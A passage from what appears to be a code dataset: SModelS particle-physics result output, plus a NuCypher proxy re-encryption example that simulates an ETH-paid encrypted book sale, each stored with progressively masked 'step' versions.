'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':
'ATLAS-CONF-2013-054', 'DataSetID': '8j50 flavor 0 b-jets',
'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':
'efficiencyMap', 'r': 0.09329401236424983, 'r_expected':
0.11876009447942563, 'chi2': 0.13085006931201093, 'likelihood':
0.005704888785414326}, {'maxcond': 0.0, 'theory prediction (fb)':
602.7377329999999, 'upper limit (fb)': 17857.06,
'expected upper limit (fb)': None, 'TxNames': ['TChiWZ'], 'Mass (GeV)':
[[163.6, 57.4], [165.0, 57.4]], 'AnalysisID': 'CMS-SUS-16-034',
'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0, 'lumi (fb-1)': 35.9,
'dataType': 'upperLimit', 'r': 0.033753469664099235, 'r_expected': None
}], 'Total xsec considered (fb)': 5455.932556090008,
'Missed Topologies': [{'sqrts (TeV)': 13.0, 'weight (fb)':
1525.2339345595758, 'element': "[[[jet]],[[jet],[jet]]] ('MET', 'MET')"
}, {'sqrts (TeV)': 13.0, 'weight (fb)': 164.5650363, 'element':
"[[],[[W]]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0, 'weight (fb)':
131.21450642075922, 'element':
"[[[jet],[Z]],[[jet],[jet]]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0,
'weight (fb)': 131.09407599353733, 'element':
"[[[jet]],[[jet],[jet],[Z]]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0,
'weight (fb)': 125.30880443708375, 'element':
"[[[jet]],[[jet],[Z]]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0,
'weight (fb)': 109.09980502038648, 'element':
"[[[jet],[jet]],[[jet],[jet],[Z]]] ('MET', 'MET')"}, {'sqrts (TeV)':
13.0, 'weight (fb)': 87.78855441, 'element':
"[[],[[Z]]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0, 'weight (fb)':
23.328775686902066, 'element': "[[],[[jet]]] ('MET', 'MET')"}, {
'sqrts (TeV)': 13.0, 'weight (fb)': 18.943846, 'element':
"[[],[]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0, 'weight (fb)':
11.23256793951906, 'element':
"[[[jet],[Z]],[[jet],[jet],[Z]]] ('MET', 'MET')"}], 'Long Cascades': [{
'sqrts (TeV)': 13.0, 'weight (fb)': 142.32664393305637, 'mother PIDs':
[[1000021, 2000001], [1000021, 2000003]]}, {'sqrts (TeV)': 13.0,
'weight (fb)': 113.78856056272761, 'mother PIDs': [[1000021, 1000021]]},
{'sqrts (TeV)': 13.0, 'weight (fb)': 2.556908397604195, 'mother PIDs':
[[2000001, 2000002], [2000002, 2000003]]}, {'sqrts (TeV)': 13.0,
'weight (fb)': 1.658904680547042, 'mother PIDs': [[1000021, 2000002]]},
{'sqrts (TeV)': 13.0, 'weight (fb)': 1.5034517332026478, 'mother PIDs':
[[1000002, 1000021]]}, {'sqrts (TeV)': 13.0, 'weight (fb)':
0.73751489438902, 'mother PIDs': [[1000021, 1000022]]}, {'sqrts (TeV)':
13.0, 'weight (fb)': 0.514380675953777, 'mother PIDs': [[1000001,
2000001], [1000001, 2000003], [1000003, 2000001], [1000003, 2000003]]},
{'sqrts (TeV)': 13.0, 'weight (fb)': 0.22710347967142056, 'mother PIDs':
[[1000002, 2000001], [1000002, 2000003]]}], 'Asymmetric Branches': [{
'sqrts (TeV)': 13.0, 'weight (fb)': 1656.3887238722155, 'mother PIDs':
[[1000021, 2000001], [1000021, 2000003]]}, {'sqrts (TeV)': 13.0,
'weight (fb)': 164.5650363, 'mother PIDs': [[1000022, 1000024]]}, {
'sqrts (TeV)': 13.0, 'weight (fb)': 126.94317745006455, 'mother PIDs':
[[2000001, 2000001], [2000001, 2000003], [2000003, 2000003]]}, {
'sqrts (TeV)': 13.0, 'weight (fb)': 81.7049616, 'mother PIDs': [[
1000022, 1000023]]}, {'sqrts (TeV)': 13.0, 'weight (fb)':
25.33546877159406, 'mother PIDs': [[1000022, 2000001], [1000022,
2000003]]}, {'sqrts (TeV)': 13.0, 'weight (fb)': 8.580393075610981,
'mother PIDs': [[1000021, 1000022]]}, {'sqrts (TeV)': 13.0,
'weight (fb)': 6.08359281, 'mother PIDs': [[1000022, 1000025]]}, {
'sqrts (TeV)': 13.0, 'weight (fb)': 2.055186185956878, 'mother PIDs': [
[1000025, 2000001], [1000025, 2000003]]}, {'sqrts (TeV)': 13.0,
'weight (fb)': 0.5969685251910638, 'mother PIDs': [[1000023, 2000001],
[1000023, 2000003]]}, {'sqrts (TeV)': 13.0, 'weight (fb)':
0.42547403652557386, 'mother PIDs': [[1000021, 1000025]]}],
'Outside Grid': [{'sqrts (TeV)': 13.0, 'weight (fb)':
0.07215987170114271, 'element': "[[[jet]],[[jet]]] ('MET', 'MET')"}, {
'sqrts (TeV)': 13.0, 'weight (fb)': 0.021621502520314927, 'element':
"[[[l]],[[l]]] ('MET', 'MET')"}]}
|
normal
|
{
"blob_id": "94d303716eac7fa72370435fe7d4d1cdac0cdc48",
"index": 6151,
"step-1": "<mask token>\n",
"step-2": "smodelsOutput = {'OutputStatus': {'sigmacut': 0.01, 'minmassgap': 5.0,\n 'maxcond': 0.2, 'ncpus': 1, 'file status': 1, 'decomposition status': 1,\n 'warnings': 'Input file ok', 'input file':\n 'inputFiles/scanExample/slha/100968509.slha', 'database version':\n '1.2.0', 'smodels version': '1.2.0rc'}, 'ExptRes': [{'maxcond': 0.0,\n 'theory prediction (fb)': 728.7491431153657, 'upper limit (fb)': \n 44.22312638711652, 'expected upper limit (fb)': None, 'TxNames': ['T2'],\n 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':\n 'CMS-SUS-16-033', 'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0,\n 'lumi (fb-1)': 35.9, 'dataType': 'upperLimit', 'r': 16.478915053090216,\n 'r_expected': None}, {'maxcond': 0.0, 'theory prediction (fb)': \n 728.7491431153657, 'upper limit (fb)': 55.74859999999999,\n 'expected upper limit (fb)': None, 'TxNames': ['T2'], 'Mass (GeV)': [[\n 541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'CMS-SUS-16-036',\n 'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0, 'lumi (fb-1)': 35.9,\n 'dataType': 'upperLimit', 'r': 13.072061775817971, 'r_expected': None},\n {'maxcond': 0.0, 'theory prediction (fb)': 132.83976207255284,\n 'upper limit (fb)': 36.140272, 'expected upper limit (fb)': None,\n 'TxNames': ['T2'], 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]],\n 'AnalysisID': 'CMS-SUS-13-019', 'DataSetID': None,\n 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 19.5, 'dataType':\n 'upperLimit', 'r': 3.675671341725177, 'r_expected': None}, {'maxcond': \n 0.0, 'theory prediction (fb)': 0.9562482176560967, 'upper limit (fb)': \n 0.274, 'expected upper limit (fb)': 0.154, 'TxNames': ['T2', 'T5',\n 'TChiZZ'], 'Mass (GeV)': None, 'AnalysisID': 'CMS-SUS-13-012',\n 'DataSetID': '6NJet8_1250HT1500_450MHTinf', 'AnalysisSqrts (TeV)': 8.0,\n 'lumi (fb-1)': 19.5, 'dataType': 'efficiencyMap', 'r': \n 3.489956998744878, 'r_expected': 6.209404010753875, 'chi2': \n 13.063642260056689, 'likelihood': 6.008581252238334e-05}, {'maxcond': \n 0.0, 'theory prediction (fb)': 132.83976207255284, 'upper limit (fb)': \n 58.50226240000003, 'expected upper limit (fb)': None, 'TxNames': ['T2'],\n 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':\n 'ATLAS-SUSY-2013-02', 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0,\n 'lumi (fb-1)': 20.3, 'dataType': 'upperLimit', 'r': 2.270677348583237,\n 'r_expected': None}, {'maxcond': 0.0, 'theory prediction (fb)': \n 9.084517413967422, 'upper limit (fb)': 4.2419,\n 'expected upper limit (fb)': 5.5524, 'TxNames': ['T2'], 'Mass (GeV)': [\n [541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'ATLAS-SUSY-2013-02',\n 'DataSetID': 'SR2jm', 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3,\n 'dataType': 'efficiencyMap', 'r': 2.141615175739037, 'r_expected': \n 1.6361424634333661, 'chi2': 11.844156696751806, 'likelihood': \n 3.1390377843658383e-07}, {'maxcond': 0.0, 'theory prediction (fb)': \n 132.83976207255284, 'upper limit (fb)': 67.69032800000002,\n 'expected upper limit (fb)': 67.79354400000003, 'TxNames': ['T2'],\n 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':\n 'CMS-SUS-12-028', 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0,\n 'lumi (fb-1)': 11.7, 'dataType': 'upperLimit', 'r': 1.9624629691933657,\n 'r_expected': 1.9594751097914693}, {'maxcond': 0.0,\n 'theory prediction (fb)': 0.7285976790027092, 'upper limit (fb)': 0.506,\n 'expected upper limit (fb)': 0.464, 'TxNames': ['T5'], 'Mass (GeV)': [[\n 881.8, 541.4, 57.4], [881.8, 541.4, 57.4]], 'AnalysisID':\n 'ATLAS-SUSY-2013-04', 'DataSetID': 'GtGrid_SR_7ej80_0bjet',\n 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':\n 'efficiencyMap', 'r': 1.4399163616654331, 'r_expected': \n 1.5702536185403213, 'chi2': 7.225026655774327, 'likelihood': \n 0.0005573265805884188}, {'maxcond': 0.0, 'theory prediction (fb)': \n 132.83976207255284, 'upper limit (fb)': 97.78847200000001,\n 'expected upper limit (fb)': 69.450736, 'TxNames': ['T2'], 'Mass (GeV)':\n [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'CMS-SUS-13-012',\n 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 19.5,\n 'dataType': 'upperLimit', 'r': 1.358439899465377, 'r_expected': \n 1.9127192845379328}, {'maxcond': 0.0, 'theory prediction (fb)': \n 4.245413557698921, 'upper limit (fb)': 4.0, 'expected upper limit (fb)':\n 4.16, 'TxNames': ['T2'], 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]],\n 'AnalysisID': 'ATLAS-CONF-2013-047', 'DataSetID': 'C Medium',\n 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':\n 'efficiencyMap', 'r': 1.0613533894247302, 'r_expected': \n 1.0205321052160867, 'chi2': 2.344696287811548, 'likelihood': \n 8.123400145704854e-05}, {'maxcond': 0.0, 'theory prediction (fb)': \n 284.6597475, 'upper limit (fb)': 1041.0116, 'expected upper limit (fb)':\n None, 'TxNames': ['TChiWZ'], 'Mass (GeV)': [[163.6, 57.4], [165.0, 57.4\n ]], 'AnalysisID': 'ATLAS-SUSY-2013-12', 'DataSetID': None,\n 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':\n 'upperLimit', 'r': 0.2734453175161545, 'r_expected': None}, {'maxcond':\n 0.0, 'theory prediction (fb)': 169.351124, 'upper limit (fb)': 1582.346,\n 'expected upper limit (fb)': None, 'TxNames': ['TChiWW'], 'Mass (GeV)':\n [[163.6, 57.4], [163.6, 57.4]], 'AnalysisID': 'ATLAS-SUSY-2013-11',\n 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3,\n 'dataType': 'upperLimit', 'r': 0.10702534338254717, 'r_expected': None},\n {'maxcond': 0.0, 'theory prediction (fb)': 0.10289469462216802,\n 'upper limit (fb)': 1.07, 'expected upper limit (fb)': 1.17, 'TxNames':\n ['TChiWW'], 'Mass (GeV)': [[163.6, 57.4], [163.6, 57.4]], 'AnalysisID':\n 'ATLAS-SUSY-2013-11', 'DataSetID': 'WWa-DF', 'AnalysisSqrts (TeV)': 8.0,\n 'lumi (fb-1)': 20.3, 'dataType': 'efficiencyMap', 'r': \n 0.09616326600202618, 'r_expected': 0.08794418343775044, 'chi2': \n 0.23492769120756485, 'likelihood': 0.0021296922629215516}, {'maxcond': \n 0.0, 'theory prediction (fb)': 0.09049519199332233, 'upper limit (fb)':\n 0.97, 'expected upper limit (fb)': 0.762, 'TxNames': ['T2'],\n 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':\n 'ATLAS-CONF-2013-054', 'DataSetID': '8j50 flavor 0 b-jets',\n 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':\n 'efficiencyMap', 'r': 0.09329401236424983, 'r_expected': \n 0.11876009447942563, 'chi2': 0.13085006931201093, 'likelihood': \n 0.005704888785414326}, {'maxcond': 0.0, 'theory prediction (fb)': \n 602.7377329999999, 'upper limit (fb)': 17857.06,\n 'expected upper limit (fb)': None, 'TxNames': ['TChiWZ'], 'Mass (GeV)':\n [[163.6, 57.4], [165.0, 57.4]], 'AnalysisID': 'CMS-SUS-16-034',\n 'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0, 'lumi (fb-1)': 35.9,\n 'dataType': 'upperLimit', 'r': 0.033753469664099235, 'r_expected': None\n }], 'Total xsec considered (fb)': 5455.932556090008,\n 'Missed Topologies': [{'sqrts (TeV)': 13.0, 'weight (fb)': \n 1525.2339345595758, 'element': \"[[[jet]],[[jet],[jet]]] ('MET', 'MET')\"\n }, {'sqrts (TeV)': 13.0, 'weight (fb)': 164.5650363, 'element':\n \"[[],[[W]]] ('MET', 'MET')\"}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 131.21450642075922, 'element':\n \"[[[jet],[Z]],[[jet],[jet]]] ('MET', 'MET')\"}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 131.09407599353733, 'element':\n \"[[[jet]],[[jet],[jet],[Z]]] ('MET', 'MET')\"}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 125.30880443708375, 'element':\n \"[[[jet]],[[jet],[Z]]] ('MET', 'MET')\"}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 109.09980502038648, 'element':\n \"[[[jet],[jet]],[[jet],[jet],[Z]]] ('MET', 'MET')\"}, {'sqrts (TeV)': \n 13.0, 'weight (fb)': 87.78855441, 'element':\n \"[[],[[Z]]] ('MET', 'MET')\"}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 23.328775686902066, 'element': \"[[],[[jet]]] ('MET', 'MET')\"}, {\n 'sqrts (TeV)': 13.0, 'weight (fb)': 18.943846, 'element':\n \"[[],[]] ('MET', 'MET')\"}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 11.23256793951906, 'element':\n \"[[[jet],[Z]],[[jet],[jet],[Z]]] ('MET', 'MET')\"}], 'Long Cascades': [{\n 'sqrts (TeV)': 13.0, 'weight (fb)': 142.32664393305637, 'mother PIDs':\n [[1000021, 2000001], [1000021, 2000003]]}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 113.78856056272761, 'mother PIDs': [[1000021, 1000021]]},\n {'sqrts (TeV)': 13.0, 'weight (fb)': 2.556908397604195, 'mother PIDs':\n [[2000001, 2000002], [2000002, 2000003]]}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 1.658904680547042, 'mother PIDs': [[1000021, 2000002]]},\n {'sqrts (TeV)': 13.0, 'weight (fb)': 1.5034517332026478, 'mother PIDs':\n [[1000002, 1000021]]}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 0.73751489438902, 'mother PIDs': [[1000021, 1000022]]}, {'sqrts (TeV)':\n 13.0, 'weight (fb)': 0.514380675953777, 'mother PIDs': [[1000001, \n 2000001], [1000001, 2000003], [1000003, 2000001], [1000003, 2000003]]},\n {'sqrts (TeV)': 13.0, 'weight (fb)': 0.22710347967142056, 'mother PIDs':\n [[1000002, 2000001], [1000002, 2000003]]}], 'Asymmetric Branches': [{\n 'sqrts (TeV)': 13.0, 'weight (fb)': 1656.3887238722155, 'mother PIDs':\n [[1000021, 2000001], [1000021, 2000003]]}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 164.5650363, 'mother PIDs': [[1000022, 1000024]]}, {\n 'sqrts (TeV)': 13.0, 'weight (fb)': 126.94317745006455, 'mother PIDs':\n [[2000001, 2000001], [2000001, 2000003], [2000003, 2000003]]}, {\n 'sqrts (TeV)': 13.0, 'weight (fb)': 81.7049616, 'mother PIDs': [[\n 1000022, 1000023]]}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 25.33546877159406, 'mother PIDs': [[1000022, 2000001], [1000022, \n 2000003]]}, {'sqrts (TeV)': 13.0, 'weight (fb)': 8.580393075610981,\n 'mother PIDs': [[1000021, 1000022]]}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 6.08359281, 'mother PIDs': [[1000022, 1000025]]}, {\n 'sqrts (TeV)': 13.0, 'weight (fb)': 2.055186185956878, 'mother PIDs': [\n [1000025, 2000001], [1000025, 2000003]]}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 0.5969685251910638, 'mother PIDs': [[1000023, 2000001],\n [1000023, 2000003]]}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 0.42547403652557386, 'mother PIDs': [[1000021, 1000025]]}],\n 'Outside Grid': [{'sqrts (TeV)': 13.0, 'weight (fb)': \n 0.07215987170114271, 'element': \"[[[jet]],[[jet]]] ('MET', 'MET')\"}, {\n 'sqrts (TeV)': 13.0, 'weight (fb)': 0.021621502520314927, 'element':\n \"[[[l]],[[l]]] ('MET', 'MET')\"}]}\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
from eth_account.account import Account
from nucypher.characters.lawful import Alice, Bob, Ursula
from nucypher.network.middleware import RestMiddleware
from nucypher.data_sources import DataSource
from umbral.keys import UmbralPublicKey
import sys
import os
import binascii
import shutil
import maya
import datetime
teacher_rest_port = 3501
m = 2
n = 3
with open("examples-runtime-cruft/node-metadata-{}".format(teacher_rest_port), "r") as f:
f.seek(0)
teacher_bytes = binascii.unhexlify(f.read())
URSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)
print("Will learn from {}".format(URSULA))
SHARED_CRUFTSPACE = "{}/examples-runtime-cruft".format(os.path.dirname(os.path.abspath(__file__)))
CRUFTSPACE = "{}/drm".format(SHARED_CRUFTSPACE)
CERTIFICATE_DIR = "{}/certs".format(CRUFTSPACE)
shutil.rmtree(CRUFTSPACE, ignore_errors=True)
os.mkdir(CRUFTSPACE)
os.mkdir(CERTIFICATE_DIR)
URSULA.save_certificate_to_disk(CERTIFICATE_DIR)
class ETHAccount(object):
def send_eth_to(self, to, amount):
return(to.fallback(self, amount))
class Author(object):
"""
The author of the book
"""
balance = 0
def __init__(self, eth_pk_bytes, character):
self.account = Account.create(eth_pk_bytes)
self.character = character
class Book(object):
def __init__(self, author):
self.author = author
self.content = b"PlainText of the book"
self.label = b"book"
class BookStoreEthContract(object):
"""
The contract receiving the rewards and selling the books
"""
def __init__(self, book, author, price, purchase_event_hook):
self.book = book
self.rewardee = author
self.price = price
self.purchase_event_hook = purchase_event_hook
def fallback(self, sender, amount):
print("Received %s ETH from %s" % (amount, sender.account.address))
if amount == self.price:
sender.balance -= amount
self.rewardee.balance += amount
return(self.purchase_event_hook(sender))
class BookStoreDelivery(object):
def __init__(self, book):
self.book = book
self.author = book.author
def deliver_purchase(self, to):
policy_end_datetime = maya.now() + datetime.timedelta(days=5)
policy = author.character.grant(first_buyer.character, self.book.label, m=m, n=n,
expiration=policy_end_datetime)
author_pubkey = bytes(self.author.character.stamp)
data_source = DataSource(policy_pubkey_enc=policy.public_key)
message_kit, _signature = data_source.encapsulate_single_message(self.book.content)
data_source_public_key = bytes(data_source.stamp)
return (author_pubkey, policy.public_key, data_source_public_key, self.book.label, message_kit)
class Buyer(ETHAccount):
"""
The person who pays for the book and receives content
"""
balance = 100
def __init__(self, eth_pk_bytes, character):
self.account = Account.create(eth_pk_bytes)
self.character = character
author = Author(b"Author's ETH account", Alice(network_middleware=RestMiddleware(),
known_nodes=(URSULA,),
federated_only=True,
known_certificates_dir=CERTIFICATE_DIR,))
author.character.start_learning_loop(now=True)
book = Book(author)
first_buyer = Buyer(b"First Buyer's ETH account", Bob(known_nodes=(URSULA,),
federated_only=True,
known_certificates_dir=CERTIFICATE_DIR))
book_store_delivery = BookStoreDelivery(book)
book_store_contract = BookStoreEthContract(book, author, 10, book_store_delivery.deliver_purchase)
author_public_key, policy_public_key, data_source_public_key, label, kit = first_buyer.send_eth_to(book_store_contract, 10)
first_buyer.character.join_policy(label, # The label - he needs to know what data he's after.
bytes(author.character.stamp), # To verify the signature, he'll need Alice's public key.
# He can also bootstrap himself onto the network more quickly
# by providing a list of known nodes at this time.
node_list=[("localhost", 3601)]
)
datasource_as_understood_by_bob = DataSource.from_public_keys(
policy_public_key=policy_public_key,
datasource_public_key=data_source_public_key,
label=label
)
alice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(author_public_key)
delivered_cleartexts = first_buyer.character.retrieve(message_kit=kit,
data_source=datasource_as_understood_by_bob,
alice_verifying_key=alice_pubkey_restored_from_ancient_scroll)
print(delivered_cleartexts)
|
normal
|
{
"blob_id": "bc843abecfc076c9413498f9ebba0da0857ad3cc",
"index": 4103,
"step-1": "<mask token>\n\n\nclass Author(object):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\n",
"step-3": "<mask token>\nwith open('examples-runtime-cruft/node-metadata-{}'.format(\n teacher_rest_port), 'r') as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\n<mask token>\nprint('Will learn from {}'.format(URSULA))\n<mask token>\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\nauthor.character.start_learning_loop(now=True)\n<mask token>\nfirst_buyer.character.join_policy(label, bytes(author.character.stamp),\n node_list=[('localhost', 3601)])\n<mask token>\nprint(delivered_cleartexts)\n",
"step-4": "from eth_account.account import Account\nfrom nucypher.characters.lawful import Alice, Bob, Ursula\nfrom nucypher.network.middleware import RestMiddleware\nfrom nucypher.data_sources import DataSource\nfrom umbral.keys import UmbralPublicKey\nimport sys\nimport os\nimport binascii\nimport shutil\nimport maya\nimport datetime\nteacher_rest_port = 3501\nm = 2\nn = 3\nwith open('examples-runtime-cruft/node-metadata-{}'.format(\n teacher_rest_port), 'r') as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\nURSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)\nprint('Will learn from {}'.format(URSULA))\nSHARED_CRUFTSPACE = '{}/examples-runtime-cruft'.format(os.path.dirname(os.\n path.abspath(__file__)))\nCRUFTSPACE = '{}/drm'.format(SHARED_CRUFTSPACE)\nCERTIFICATE_DIR = '{}/certs'.format(CRUFTSPACE)\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nauthor = Author(b\"Author's ETH account\", Alice(network_middleware=\n RestMiddleware(), known_nodes=(URSULA,), federated_only=True,\n 